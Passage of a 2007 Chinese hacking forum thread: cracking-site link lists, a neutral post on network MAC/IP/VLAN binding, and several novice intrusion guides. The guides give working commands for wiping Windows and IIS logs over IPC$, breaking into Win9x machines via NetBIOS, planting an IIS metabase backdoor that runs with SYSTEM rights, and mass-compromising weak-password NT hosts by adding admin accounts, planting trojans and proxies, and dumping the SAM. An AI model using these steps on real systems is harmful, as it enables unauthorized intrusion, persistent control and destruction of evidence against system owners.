3. CoDe_InSiDe - http://codeinside.cjb.net (Mine/CoDe's tutorials)

4. Eternal_Bliss - http://ebliss.cjb.net (Visual-Basic)

5. +Sandman - http://www.idca.com/~thesandman/index2.html (Best - Recommended)

6. Icezelion's Win32Asm - http:/win32asm.cjb.net (Coding)

7. tHE Egoiste - http://egoiste.da.ru (Great page with Crypto Stuff)

8. CrackMe's Page - http://crackmes.cjb.net (Recommended, dl all CrackMe from here)


--------破解工具类:---------
1. Programmers Tools - http://protools.cjb.net (Best)

2. Play Tools - http://playtools.cjb.net (Great)

3. EXE Tools - http://exetools.cjb.net/ (Average)

4. Aaron's Tools - http://mud.sz.jsinfo.net/per/aaron/index.htm (Average)

5. http://ProcDump32.cjb.net

6. Freak2freak.cjb.net

7. www.sysinternals.com (FileMon)

8. http://rpi.net.au/~ajohnson/resourcehacker

9. http://muaddib.immortaldescendants.org

10.http://frog.fsn.net (May be down)


-----------破解组织类:-----------
1. PGC - http://www.pgc-force.com

2. The Millenium Group - http://tmg.da.ru/ (Keygen Factory :-)

3. HellForge - http://www.hellforge.org/

4. The Cracking Answer - http://tca2k.da.ru/

5. Immortal Descendants - http://www.immortaldescendants.org

6. TrickSoft - http://emc2k.com/tricksoft/

7. DOOM - http://deadlyzone.virtualave.net/Html/load.htm

8. http://www.suddendischarge.com/
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 65楼  发表于: 2007-11-16 0
简单黑客工具使用


1.小榕的elsave清除日志的使用:

  先用ipc$管道进行连接:net use \ipipc$ "password" /user:""

  清除目标系统的应用程序日志:

  elsave -s \ip -l "application" -C

  清除目标系统的系统日志:

  elsave -s \ip -l "system"" -C

  清除目标系统的安全日志:

  elsave -s \ip -l "security" -C

  

  2.windows2000日志的清除:

  www的日志一般都在%winsystem%system32logfilesw3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.

  win2000中的其他一些日志:

  安全日志:%winsystem%system32configSecevent.evt

  应用程序日志:%winsystem%system32configAppEvent.evt

  系统日志:%winsystem%system32configSysEvent.evt

  IIS的FTP日志:%winsystem%system32logfilesmsftpsvc1,默认每天一个日志

  IIS的www日志:%winsystem%system32logfilesw3svc1 默认每天一个日志

  Scheduler服务日志:%winsystem%schedlgu.txt

  注册表所在项目:

  [HKLM]systemCurrentControlSetServicesEventlog

  Schedluler服务注册表所在项目:

  [HKLM]SOFTWAREMicrosoftSchedulingAgent

  如果日志被从新定位,路径在注册表里面有记录.

  
清除日志

  清除日志必须先停掉相关的服务后才能进行:

  www和ftp日志必须想停w3svc: net stop w3svc

  然后就可在相关日志目录下面把你想要删除的日志删除.

  Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"

  系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.

  也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:

  cleaniislog [logfile] [.] [cleanIP] .

  说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录

  举例:cleaniislog . 127.0.0.1

  A.可以清除指定的的IP连接记录,保留其他IP记录。

  B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。

  用法: CleanIISLog  <.>  <.>

  : 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。

  : 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。

  CleanIISLog只能在本地运行,而且必须具有Administrators权限。
知道对方IP入侵别人的电脑
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明熗易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 66楼  发表于: 2007-11-16 0
浅谈绑定之应用


目前以太网已经普遍应用于运营领域,如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性,采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求,绑定是目前普遍宣传和被应用的功能,如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定,从而实现对以太网用户的管理。

  一、绑定的由来

  绑定的英文词是BINDING,其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子,就是配置网卡时,将网络协议与网卡驱动绑定在一起。其实在接入认证时,匹配用户名和密码,也是一种绑定,只有用户名存在并且密码匹配成功,才认为是合法用户。在这里,用户名已经可以唯一标识某个用户,与对应密码进行一一绑定。

  二、绑定的分类

  从绑定的实现机制上,可以分为AAA(服务器)有关绑定和AAA无关绑定;从绑定的时机上,可以分为静态绑定和动态绑定。

  AAA是用户信息数据库,所以AAA有关绑定以用户信息为核心,认证时设备上传绑定的相关属性(端口、VLAN、MAC、IP等),AAA收到后与本地保存的用户信息匹配,匹配成功则允许用户上网,否则拒绝上网请求。

  AAA无关绑定完全由接入设备实现。接入设备(如Lanswitch)上没有用户信息,所以AAA无关绑定只能以端口为核心,在端口上可以配置本端口可以接入的MAC(或IP)地址列表,只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。

  静态绑定是在用户接入网络前静态配置绑定的相关信息,用户接入认证时,匹配这些信息,只有匹配成功才能接入。

  动态绑定的相关信息不是静态配置的,而是接入时才动态保存到接入设备上,接入网络后不允许用户再修改这些信息,一旦修改,则强制用户下线。

  AAA相关绑定一般都是静态绑定,动态绑定一般都是在接入设备上实现的。接入设备离最终用户最近,用户所有的认证数据流和业务数据流都必须经过接入设备,只有认证数据流经过AAA,所以接入设备可以最容易最及时发现相关绑定信息的变化,也方便采取强制用户下线等处理措施。另外,网络中AAA一般只有一台,集中管理,接入设备却有很多,由分散的接入设备监视用户绑定信息的变化,可以减轻AAA的负担。

  三、绑定的应用模式

  除了常用的用户名与密码绑定外,可以用于绑定的属性主要有:端口、VLAN、MAC地址和IP地址。这些属性的特性不同,其绑定的应用模式也有较大差别。

  1、IP地址绑定

  1)解释

  按照前边的定义标准,IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。

  AAA有关IP地址绑定:在AAA上保存用户固定分配的IP地址,用户认证时,接入设备上传用户机器静态配置的IP地址,AAA将设备上传IP地址与本地保存IP地址比较,只有相等才允许接入。

  AAA无关IP地址绑定:在接入设备上配置某个端口只能允许哪些IP地址接入,一个端口可以对应一个IP地址,也可以对应多个,用户访问网络时,只有源IP地址在允许的范围内,才可以接入。

  IP地址静态绑定:接入网络时检查用户的IP地址是否合法。

  IP地址动态绑定:用户上网过程中,如更改了自己的IP地址,接入设备能够获取到,并禁止用户继续上网






2)应用

  教育网中,学生经常改变自己的IP地址,学校里IP地址冲突的问题比较严重,各学校网络中心承受的压力很大,迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应,解决IP地址问题。

  如有DHCP Server,可以使用IP地址动态绑定,限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址,静态配置的IP地址无效。如没有DHCP Server,可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式,限制用户只能使用固定IP地址接入,接入后不允许用户再修改IP地址。通过DHCP Server分配IP地址时,一般都可以为某个MAC地址分配固定的IP地址,再与AAA有关MAC地址绑定配合,变相的做到了用户和IP地址的一一对应。

  2、MAC地址绑定

  1)解释

  与IP地址绑定类似,MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定;MAC地址静态绑定和MAC地址动态绑定。

  由于修改了MAC地址之后,必须重新启动网卡才能有效,重新启动网卡就意味着重新认证,所以MAC地址动态绑定意义不大。

  2)应用

  AAA有关MAC地址绑定在政务网或园区网中应用比较多,将用户名与机器网卡的MAC地址绑定起来,限制用户只能在固定的机器上上网,主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的,所以这个方法还存在一些漏洞的。

  3、端口绑定

  1)解释

  端口的相关信息包含接入设备的IP地址和端口号。

  设备IP和端口号对最终用户都是不可见的,最终用户也无法修改端口信息,用户更换端口后,一般都需要重新认证,所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了,所以AAA无关端口绑定也没有意义。

  有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。

  2)应用

  AAA有关端口绑定主要用于政务网、园区网和运营商网络,从而限制用户只能在特定的端口上接入。

  4、VLAN绑定

  1)解释

  与端口绑定类似,VLAN相关信息也配置在接入设备上,最终用户无法修改,所以,VLAN动态绑定意义不大。对于AAA无关VLAN绑定,如只将端口与VLAN ID绑定在一起,那么如果用户自己连一个HUB,就会出现一旦此HUB上的一个用户认证通过,其他用户也可以上网的情况,造成网络接入不可控,所以一般不会单独使用AAA无关的VLAN绑定。

  常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。





 2)应用

  如网络接入采用二层结构,上层是三层交换机,下层是二层交换机,认证点在三层交换机上,这种情况下,仅靠端口绑定只能限制用户所属的三层交换机端口,限制范围太大,无法限制用户所属的二层交换机端口。

  使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。

  分别为二层交换机的每个下行端口各自设置不同的VLAN ID,二层交换机上行端口设置为VLAN透传,就产生了一个三层交换机端口对应多个VLAN ID的情况,每个VLAN ID对应一个二层交换机的端口。用户认证时,三层交换机将VLAN信息上传到AAA,AAA与预先设置的信息匹配,根据匹配成功与否决定是否允许用户接入。

  此外,用户认证时,可以由AAA将用户所属的VLAN ID随认证响应报文下发到接入设备,这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网,但是可以限制用户无论从那个端口接入,使用的都是用一个VLAN ID。这样做的意义在于,一般的DHCP Server都可以根据VLAN划分地址池,用户无论在哪个位置上网,都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些,变相的实现了在出口路由器上根据用户名制定访问权限的功能。

  5、其它说明

  标准的802.1x认证,只能控制接入端口的打开和关闭,如某个端口下挂了一个HUB,则只要HUB上有一个用户认证通过,该端口就处于打开状态,此HUB下的其他用户也都可以上网。为了解决这个问题,出现了基于MAC地址的认证,某个用户认证通过后,接入设备就将此用户的MAC地址记录下来,接入设备只允许所记录MAC地址发送的报文通过,其它MAC地址的报文一律拒绝。

  为了提高安全性,接入设备除了记录用户的MAC地址外,还记录了用户的IP地址、VLAN ID等,收到的报文中,只要MAC地址、IP地址和VLAN ID任何一个与接入设备上保存的信息匹配不上,就不允许此报文通过。有的场合,也将这种方式称为接入设备的“MAC地址+IP地址+VLAN ID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似,只是用途和目的不同。

  四、业界厂商产品对绑定的支持

  以上的常用绑定功能业界厂商都普遍支持,一些厂商还进行了更有特色的功能开发,如华为提供的以下增强功能:

  1、绑定信息自学习

  1)MAC地址自动学习

  配置AAA相关MAC地址绑定功能时,MAC很长,难以记忆,输入时也经常出错,一旦MAC地址输入错误,就会造成用户无法上网,大大增加了AAA系统管理员的工作量。CAMS实现了MAC地址自动学习功能,可以学习用户第一次上网的MAC地址,并自动与用户绑定,既减少了工作量,又不会出错。以后用户MAC地址变更时,系统管理员将用户绑定的MAC地址清空,CAMS会再次自动学习用户MAC地址。

  2)IP地址自动学习

  与MAC地址自动学习类似。

  2、一对多绑定

  1)IP地址一对多绑定

  用户可以绑定不只一个IP地址,而是可以绑定一个连续的地址段。这个功能主要应用于校园网中,一个教研室一般都会分配一个连续的地址段,教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化,将用户和教研室的整个地址段绑定后,可以由各教研室自己分配和管理内部IP地址,既不会因教研室内部IP地址分配问题影响整个校园网的正常运转,又可以大大减少AAA系统管理员的工作量。

  2)端口一对多绑定

  与IP地址一对多绑定类似,也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分:接入设备IP地址-槽号-子槽号-端口号-VLAN ID,这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符,表示不限制具体数值。比如,端口号部分输入通配符,就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上,可以从其中的任何一个端口接入。
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 67楼  发表于: 2007-11-16 0
永远的后门

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。


如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:WINNThelpiisHelpcommon400.htm"
"401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"
"401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"
"401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"
"401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"
"401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm"
"403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"
"403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"
"403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"
"403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"
"403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"
"403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"
"403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"
"403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"
"403,9,FILE,C:WINNThelpiisHelpcommon403-9.htm"
"403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"
"403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"
"403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"
"403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"
"403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"
"403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"
"403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm"
"404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"
"405,*,FILE,C:WINNThelpiisHelpcommon405.htm"
"406,*,FILE,C:WINNThelpiisHelpcommon406.htm"
"407,*,FILE,C:WINNThelpiisHelpcommon407.htm"
"412,*,FILE,C:WINNThelpiisHelpcommon412.htm"
"414,*,FILE,C:WINNThelpiisHelpcommon414.htm"
"500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"
"500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"
"500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:inetpubwwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:inetpubwwwrootdir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)

大家不可以用来做非法的攻击,一切后果自负
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 68楼  发表于: 2007-11-16 0
入门者如何获得肉鸡


入门者如何获取肉鸡(跳板)

入门者如何获取肉鸡(跳板)
今天我们来讲一讲一些简单的入侵,这篇文章是送给新手的,难的文章我也写不出来~~ 这里讲的方法都是针对winnt和2000的,平台是2000。我只是想送给新手点肉鸡罢了。

罗嗦了这么多,现在我们开始吧~。首先我们来对几个扫描器评点一下什么?你不知道扫描器是什么?我晕~~~扫描器就是扫描的嘛,它可以检测出主机的漏洞!
常见的有端口扫描器,和cgi漏洞扫描器,还有就是象流光那样的大型扫描器,什么都可以扫。我们先来讲一下扫描器的原理!
现在假设你是A,要扫的是B
那么,通常建立3次握手的过程是
A--------Syn------->B
A<-----Syn/Ack------B
A-------Ack-------->B
这样就建立了连接,扫描就是建立很多这样的,从而达到了解对方开了哪些端口,哪些服务厉害的扫描器还会进一步探测!但是,这种tcp扫描会留下大量的记录,如果B的网管不是注意文明用语那么他就会开始注意你了!!
所以我们又会用半开放式扫描(syn)
也就是
A--------Syn------->B
A<-----Syn/Ack------B
A------->\ B
A-connected--?<-----B
这样,由于B一直得不到确认,当然就不会记录ip啦,不过B若是很bt,那么他也会记录任何syn的 ip,那就没办法了!!

扫描的原理讲完了,现在来讲讲几个扫描的工具!!这才是重点,新手哪会关心

那原理啊~~~ 我们先来讲端口扫描器一个端口就是一条路,进入系统的的路!可见他的重要!!
我推荐用superscan和nscan两个都是国外的,superscan的汉化版有问题,建议去www,peckerland.com下载E文版
nscan在黑白有下! 这两个的界面简单,我就不罗嗦了!我很喜欢superscan.他的扫描准且快~~对单一端口的大规模扫描也很不错,以前大家就是用它来扫3389的!

下面我来介绍流光!!xscan!!和sss!!! 我想大家对流光应该不陌生吧!如果你是新手,先从流光开始!!界面很cool!多亏榕哥~~不过我宁可把流光作为一个攻击的工具而不是扫描的工具xscan则是安全焦点的,他可以半开放式扫描!!
而且在扫描上我觉得比流光好!因为我问过sharkstorm,他说流光会在对方主机上留下痕迹,所以我怀疑流光用的是tcp扫描! 所以我现在用大规模扫描时是用xscan而不是流光! 接下来是sss,现在的最新版是3.43,在www.peckerland.com上有3.41版和注册机.
他是由redshadow开发的,全称shadow security scanner他能扫描很多漏洞,速度也很快,留下的痕迹少,产生报告详细.有时候流光或是国内一些扫描器会误报,这时我常用他来检测.所以,在入侵单一机器时,我用的就是它!!!!
好累啊,先喝口茶~~~下面就讲怎样获得大量肉鸡! 这里我推荐用扫描nt弱口令的方法! 当然也许别人会推荐扫描sql的弱口令,但网上的nt弱口令真的比sa为空的要多太多了~~ 我们先打开流光4->扫描->简单扫描->nt/98->IP段开始扫,扫到很多139开了的主机然后ipc主机,右键->探测->远程探测用户然后就会有很多用户和共享被扫出来,其中有可能包括弱口令(参见杀手的流光教程)这里我告诉大家一个秘诀,就是有很多是guest为admin权限的,这些的密码一般为空这是因为这台主机被攻破过,有人留下了后门,这下便宜我们了,先拿来用了再说!
前面我们说过,我不喜欢用流光来扫描,所以,我们在这里用xscan来扫描nt弱口令! 在扫描选项里选nt弱口令,然后来个ip范围,让他扫,接下来就可以等待战果了一般会很丰硕,我每次扫这个都很爽!!! 接下来就要讲怎么用了!前面提到过我喜欢用流光来攻击,现在就让我们看看他的强大!! 流光4->工具->nt/iis工具->nt远程管道命令输入ip,刚才扫到的用户名,密码(若为空则不填) 连接!
ntcmd>net user
看看,连上了吧~~
我们来添加一个用户名
ntcmd>net user aaa 123 /add
命令成功完成

加到administrators组
ntcmd>net localgroup administrators aaa /add
命令成功完成

好了,这样肉鸡就做好了.什么?你想把他作成跳板? 好的,我们继续来
流光4->工具->nt/iis工具->ipc种植者
添上ip,用户名,密码等
然后点开始
接下来我们再用telnet连上去,去debug snake的sksockserver注意,用ntcmd

不能安装sksockserver。
具体我就不说了,大家自己参考说明.

当然,大家也可以放一堆后门上去.
不过我喜欢这样
ntcmd>net use g: \ipc$
命令成功完成

这样,我们就把他的c盘映射成了我的g盘。然后我再放个木马的server上去再用ntcmd运行,呵呵搞定~~,玩他没商量!!!
我们还可以把c;winntrepairsam._抓下来,用lc3跑一下 就得到所有用户的密码,或是用木马抓密码!!
当然我们也可以telnet上去运行tlntadmn来修改telnet端口,更隐蔽怎么扩大战果呢?我们仍用ntcmd
ntcmd>net view
......
出来很多机器名,这是和我们的肉鸡共享的
比如有一台是
\LOVE
我们就
ntcmd>ping -a LOVE
这样就得到了他的ip
我一般会用sss再扫一次
当然,你也可以用你得到的密码去试试,看能不能进去,呵呵

有一次,我"不小心"跑到某教育部门,net view一下,居然和教育局挂钩....接下来出于自身安全,我就停住了,呵呵,中国的政府不能乱搞的~~~

最后是打扫脚印,建议用小榕的cleaniislog,很方便,用法参见说明! 请记住,入侵nt的首选绝对是139,netbios

补充一点,大家在连接时可以用2000自带的计算机管理->连接到计算机这样也很方便.

关于其他几种方法,我在这里说明一下

输入法基本上绝种了~~ 不过如果你扫大量的肉鸡也许还有最好用的应该数sql的sa为空,直接用流光连就行了,连上后就可以直接添加帐号等,但是有一点不好有时候会连不上。比如我在学校机房就从来没连上过,估计是我在内部网络,有硬防火墙的原因,我在3389上就连的很好。不过总是玩这个是不会提高的!其次要说明的就是idq溢出与.printer的漏洞,这两个漏洞我不想多说什么,因为很多人都会用但成功不了,我在这里就说说什么情况下可以成功。一般来说,用xscan扫描,如果出现说isapi扩展,那么恭喜你,如果存在这两个漏洞绝对成功,我屡试不爽。因为这两个漏洞都与iis那个破东西息息相关,所以大家不要被别的扫描器的误报迷惑,在安焦的漏洞库有这两个漏洞的详细说明。

关于unicode漏洞请参见ncc写的教程

流光是一个很好的攻击工具,他的exploits文件夹和tools文件夹的东西大家漫漫体会,呵呵。不说了,不然天下大乱了!!

总之,98的安全性比2000好,因为98基本上没用 一般来说,入侵98是从139,要改自己的lmhosts文件来达到入侵的目的! 不过我劝新手不要沉迷在我讲的方法中,虽然你能从中的到很多肉鸡,但是绝对不要做简单重复的工作 当有了一定水平后要去玩linux,unix,不然水平不会提高. 我写这篇文章的目的是让大家学习,请不要破坏,若是因此引起的一切后果本人概不负责!!
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 69楼  发表于: 2007-11-16 0
流光的使用方法


窍门一:

1.很多人都有使用流光4.71之前版本的经验,不过现在请下载流光5.0内部测试版.地址:

http://www.netXeyes.com 安全焦点

http://www.swed.com.tw/xiaonu/f.rar 小奴私人下载

下载后解压安装! 解压密码在说明文件里..
(强烈建议查看readme文档再安装撒...)

安装后打上时间补丁...请把补丁放在同一个文件夹里.

2.如果没有安装时间补丁一打开流光就会出现:"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"

3.如果安装了时间补丁,你可以打开5.0.但是还是会出现"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"...这时我们就要用到特别的方法来防止流光5.0过期了...

4.(仔细..再仔细)如果你有金山网标或者天网之类的防火墙的话...恭喜你.你就快成功了..小榕设计流光5.0内部测试版的时候会让打开主程序就会自动访问四个IP地址.
第一个是61.166.33.214 -- 云南省 楚雄市
第二个是218.30.12.185 -- 陕西省 西安市 (可能会变)
第三个是61.166.33.214 (跟第一个一样)
第四个是66.94.230.45 -- 美国(可能会变..这个很"阴险"大概在前面三个IP过后20秒左右它才出现)

防火墙首先禁止前面四个IP连接.(直接点击禁止就可以了)...

四个IP过后随便你扫什么都不会有限制.如果这时防火墙询问你是不是允许流光5.0访问**.**.**.**(ip)?? 当然点击允许啦...要不怎么扫??

4.流光5.0增强了SENSOR的扫描属性.很强大...特别是"TELNET ip 控制端口"和数据包转发功能我佩服得7体投地...自带有说明文件.大家看看就知道了.(我在这里就不废话了撒...呼呼)
_________________________________


窍门二:

还有一个比较"失败"的方法.打开补了丁的流光之前首先关闭网络连接,即不要上网.过1分钟以后再打开网络连接...这时你就可以无忧用5.0了..(这样做是防止一开流光5.0就访问指定IP)
_________________________________

窍门三:

听"新丁"(我在黑基的兄弟)说更改流光的图标也可以防止过期提示,我没试过.大家试试..
_________________________________

TNND...酒气冲头.难受死了...坚持搞完..
_________________________________

友情提醒:

1.如果你是天网防火墙请把"属性设置"--"自动允许每个程序运行并记录日志"(好像是这样吧)的勾去掉...这样就可以拦截流光运行时访问的IP地址了..

2.流光5.0由于是内部测试版本,所以不限制国内IP扫描.请千万不要!不要!!不要!!!扫国内IP!尽量多种植SENSOR到你的外国肉鸡上帮你扫撒....(呼呼,我最喜欢做的事)

3.流光5.0太强大.扫描的IP段尽可能少点...这个版本中包含了工具ARP Netwok Sniffer,这是一个基于ARP SPOOF的工具,有可能会造成目标网络出现故障甚至于中断,在使用的时候不要指定过于大的IP范围。推荐不要超过32台主机。--- 引用

不要把自己的机子都搞死了!同时尽量不要使用"网络嗅探"功能. "要知道在一个100M的环境中的流量是非常大的,所以请首先确定您自己的主机是否有足够的带宽接收传输数据" --- 引用!

___________________________________

某些醉话...

1.很多人扫描的时候会扫到用户:root:空 admin:同 administrator:同 wwwadmin:同 等同时存在于一个IP的现象.但是建立IPC连接的时候却失败.

注意:这些是虚报...请你点击"选项(o)"---"IPC用户列表选项(I)"----把"如果主机不允许列出用户则强制从以下文件导入"的选项去掉...这样你扫描出来的用户就不会虚报了...

2.扫描的时候要注意时间...要想到国外的时间跟我们有差异...如果你特别喜欢在我们的下午4点扫美国的IP段...那我没话可说!

3.不要扫描自己不会利用的漏洞和端口...反正自己不会用,扫又浪费时间...(如果你打算学习怎么利用...那鼓励你扫!)

4.流光的综合性很强!注意看每一项选项内容,自己摸索更好的综合扫描办法,....

玩木马


如果你是高手,看了这篇文章你会觉得无聊,如果你是菜鸟(和我一样菜的话)或者会有点用。哪个人不爱玩?给我站出来!我要狠狠的KKKKK他一顿。5555.........好了,闲话少说为好,转入正题吧。首先我用到的工具主要是两个,1.扫描工具:代理猎手,2.冰河2.2客户端。(哪里有下载?自己找吧)下面分两步走:
一.扫描篇:
